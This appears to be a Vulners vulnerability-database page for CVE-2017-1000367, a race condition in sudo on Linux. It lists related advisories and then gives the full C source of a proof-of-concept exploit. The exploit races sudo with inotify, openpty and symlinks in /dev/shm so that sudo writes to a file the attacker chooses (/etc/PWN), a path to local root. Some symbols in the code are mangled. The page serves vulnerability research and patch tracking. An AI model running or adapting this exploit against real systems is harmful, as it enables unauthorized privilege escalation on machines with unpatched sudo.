Vulners
Lucene search
CVE-2017-1000367 in Sudo's get_process_ttyname() for Linux
| Reporter | Title | Published | Views | Family All 143 |
|---|---|---|---|---|
 | Exploit for Race Condition in Sudo_Project Sudo | 1 Jun 201717:41 | – | gitee |
 | Sudo get_process_ttyname() Race Condition Vulnerability | 3 Jun 201700:00 | – | zdt |
| Sudo - get_process_ttyname() Privilege Escalation Vulnerability | 16 Jun 201700:00 | – | zdt |
 | Security Bulletin: Multiple vulnerabilities in coreutils, sudo, jasper, bind, bash, libtirpc, nss and nss-util affect IBM SmartCloud Entry | 19 Jul 202000:49 | – | ibm |
| Security Bulletin: A vulnerability in sudo affects PowerKVM | 18 Jun 201801:36 | – | ibm |
 | Security fix for the ALT Linux 8 package sudo version 1:1.8.20p1-alt1 | 31 May 201700:00 | – | altlinux |
 | Amazon Linux 2 : sudo (ALAS-2019-1315) | 15 Oct 201900:00 | – | nessus |
| Amazon Linux AMI : sudo (ALAS-2017-843) | 7 Jun 201700:00 | – | nessus |
| Amazon Linux AMI : sudo (ALAS-2017-855) | 7 Jul 201700:00 | – | nessus |
| CentOS 6 / 7 : sudo (CESA-2017:1382) | 1 Jun 201700:00 | – | nessus |
10
#include <errno.h>
#include <linux/sched.h>
#include <pty.h>
#include <sched.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/inotify.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#define EVENT_SIZE ( sizeof (struct inotify_event) )
#define EVENT_BUF_LEN ( 1024 * ( EVENT_SIZE + 16 ) )
int main( )
{
int length, i = 0;
int fd;
int wd;
char buffer[EVENT_BUF_LEN];
int master, slave;
char pts_path[256];
struct sched_param params;
params.sched_priority = 0;
mkdir("/dev/shm/_tmp", 755);
symlink(pts_path, "/dev/shm/_tmp/_tty");
symlink("/usr/bin/sudo", "/dev/shm/_tmp/ 34873 ");
fd = inotify_init();
wd = inotify_add_watch( fd, "/dev/shm/_tmp", IN_OPEN | IN_CLOSE_NOWRITE );
pid_t pid = fork();
setpriority(PRIO_PROCESS, pid, 19);
sched_setscheduler(pid, SCHED_IDLE, ¶ms);
if(pid == 0) {
execlp("/dev/shm/_tmp/ 34873 ", "sudo", "--\nHELLO\nWORLD\n", NULL);
}else{
length = read( fd, buffer, EVENT_BUF_LEN );
while ( i < length ) {
struct inotify_event *event = ( struct inotify_event * ) &buffer[ i ];
if ( event->len ) {
if ( event->mask & IN_OPEN ) {
kill(pid, SIGSTOP);
inotify_rm_watch( fd, wd );
close( fd );
while(strcmp(pts_path,"/dev/pts/57")){
openpty(&master, &slave, &pts_path[0], NULL, NULL);
};
kill(pid, SIGCONT);
}else if ( event->mask & IN_CLOSE_NOWRITE ) {
kill(pid, SIGSTOP);
inotify_rm_watch( fd, wd );
close( fd );
unlink("/dev/shm/_tmp/_tty");
symlink("/etc/PWN", "/dev/shm/_tmp/_tty");
kill(pid, SIGCONT);
break;
}
}
i += EVENT_SIZE + event->len;
}
}
unlink("/dev/shm/_tmp/_tty");
unlink("/dev/shm/_tmp/ 34873 ");
rmdir("/dev/shm/_tmp");
close(master);
close(slave);
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 May 2017 00:00Current
7.4High risk
Vulners AI Score7.4
EPSS0.19918